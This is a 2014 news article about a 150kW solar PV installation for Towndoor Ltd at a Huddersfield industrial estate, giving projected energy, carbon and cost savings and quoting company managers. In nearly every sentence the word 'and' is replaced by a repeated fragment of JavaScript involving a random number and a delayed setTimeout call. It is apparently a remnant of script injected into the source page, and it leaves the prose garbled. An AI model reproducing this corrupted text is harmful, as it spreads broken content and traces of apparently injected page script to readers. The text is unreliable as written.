Solar scheme will cut energy costs by £760,000

  • 2nd September 2014

G&H Sustainability has been appointed by a commercial property rental company to deliver a 150Kw solar PV system to cut carbon emissions andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and reduce energy costs by £760,000.

Towndoor Ltd commissioned G&H Sustainability to deliver the works at Bent Ley Industrial Estate, Huddersfield.

Solar panels will be installed across its industrial estate premises currently occupied by Harold Fisher Plastics Ltd, Equitrek Ltd andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Bewleys Coffee Ltd.

The system will save Towndoor Ltd nearly 120,000kWh-a-year in energy, 52,990kg in carbon emissions andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and a projected £25,685-a-year in fuel bills for a minimum of 20 years.

Further paybacks including the reduction in the climate change levy will see the fuel saving increase to £760,000.

National Sales Manager at G&H Sustainability, Martin Greenwood, said: “We are managing the whole process, from securing local authority planning permission andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and designing the scheme to the next stage of installing the panels andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and carrying out an on-going maintenance programme.

“Towndoor wants to reduce the carbon footprint at its buildings andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and lower electricity costs for its business tenants so solar PV is the ideal solution.

“Towndoor will also be able to take advantage of the government’s Feed in Tariff (FIT) that makes payments linked to the energy produced every three months for the next 20 years.

“Pay backs are aligned to the rate of inflation andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and means Towndoor Ltd will make savings of £760,000 over the lifespan of the FIT while being protected them from the expected increase in fuel prices.”

Managing Director at Towndoor Ltd, Dan Bamforth, said: “The investment we are making in our premises will benefit us, our tenants andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and the environment.

“Fuel bills can be on one of the biggest outgoings for many businesses so producing free, sustainable electricity will make a big difference.

“G&H Sustainability has a proven track record of delivering schemes of this nature having worked on a national scale for large PLCs as well as SMEs andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and we are now looking at other renewable technologies they offer such as biomass, lighting, controls andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and monitoring systems.

“This underlines our commitment to making our business andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and premises as green as possible.”
